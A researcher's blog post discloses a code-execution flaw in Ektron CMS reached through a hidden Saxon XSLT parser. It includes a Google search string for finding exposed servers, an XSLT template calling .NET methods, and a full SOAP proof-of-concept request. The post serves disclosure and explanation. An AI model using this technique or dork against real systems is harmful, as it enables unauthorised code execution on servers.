Mar 2, 2015

Exploiting the hidden Saxon XSLT Parser in Ektron CMS

This was originally posted on blogger here.

Another vulnerability I came across was in Ektron CMS. It’s a .NET-based Web CMS System. If you want to find running instances try “inurl:/workarea filetype:asmx” at Google. The interesting thing about is that Microsoft already reported the initial vulnerability as MSVR12-016 (CVE-2012-5357), but I found a different vector to exploit it.

Summary

From US CERT VU#110652:

Ektron Content Management System version 8.5, 8.7, and 9.0 contain a resource injection vulnerability by using an improperly configured XML parser. By default, Ektron utilizes the Microsoft XML parser to parse XSLT documents, which is not vulnerable. If an attacker specifies use of the Saxon XSLT parser instead, and sends it a specially crafted XSLT document, the attacker may be able to run arbitrary code at the privilege level of the application.

Vulnerability Details

During information gathering, I found several Web services exposed on the Ektron CMS system. One of them was

http://[host]/Workarea/ServerControlWS.asmx

Looking at the WSDL, there was the SOAP method ContentBlockEx, having a parameter that nearly jumped into my face: xslt.

If you can get your data parsed by a XSLT parser, that’s almost like hitting the jackpot. The problem was that Ektron already patched the vulnerability by hardening the MSXML parser. Nevertheless, XXE was still possible - but I couldn’t get any helpful information out of the system. There was also another vulnerability that allowed me to list directories. Finally, I found the directory with all .net DLL’s. After browsing through the directory, I finally found something interesting. There were several saxon9*.dlls. From my former times, I could remember that Saxon allows me to parse XSLT. So I had a look at the documentation at Saxon Function Library.

Looking at the different namespaces, I found several interesting functions working with files, etc. After browsing through the Saxon documentation, I finally found an interesting paragraph Saxon Calling Static Methods in a .NET Class From this, it seemed like I could call static functions of .net CRL classes from Saxon :-)

So I created the following XSLT template:

<xsl:transform version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:saxon="http://saxon.sf.net/">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:text>asdf</xsl:text>
    <out xmlns:env="clitype:System.Environment" xmlns:os="clitype:System.OperatingSystem">
      <xsl:value-of select="env:Version()"/>
    </out>
    <xsl:text>asdf</xsl:text>
  </xsl:template>
</xsl:transform>

Putting it all together, the final SOAP request looks like this:

POST /Workarea/ServerControlWS.asmx HTTP/1.1
Host: xxxxx
Content-Type: text/xml; charset=utf-8
Content-Length: 880
SOAPAction: "http://www.ektron.com/CMS400/Webservice/ContentBlockEx"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ContentBlockEx xmlns="http://www.ektron.com/CMS400/Webservice">
      <id>1</id>
      <Xslt>
<![CDATA[ 
<xsl:transform version="2.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:saxon="http://saxon.sf.net/">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:text>
asdf
</xsl:text>

<out xmlns:env="clitype:System.Environment" xmlns:os="clitype:System.OperatingSystem"> 

<xsl:value-of select="env:Version()"/>
</out> 

<xsl:text>
asdf
</xsl:text>
</xsl:template>
</xsl:transform>
]]></Xslt>
      <over>1</over>
      <LangID>1</LangID>
    </ContentBlockEx>
  </soap:Body>
</soap:Envelope>

Vendor Response

I wasn’t involved, although CERT tried to contact them with no luck.

The Fix

Ektron released a Security Update 2 (Releases 8.02 SP5 to 9.10 SP1). To my amazement, Ektron told CERT the following:

This was patched via a cumulative security patcher that was made available Oct 9, 2013 that would apply the updates to versions 8.0.2 to 9.0. The current version of the patcher is available at: https://portal.ektron.com/News/Security/Security_Notice_-_11-25-14/ 8.7sp2 (released 8/16/2013), 9.0sp1 (released 8/19/2013), and 9.1 (released 8/28/2014) were all released with the fix in place. Subsequent service packs also contain the fixes for those versions

To be honest, I don’t think this statement is true. What Ektron did in 2013 was to reconfigure Ektron CMS to expose the Web services only on localhost by default. An administrator can still reconfigure it. Nevertheless, with “Security Update 2”, all the parser hardening was hopefully implemented. I haven’t verified it yet because there is no public download available for the latest version.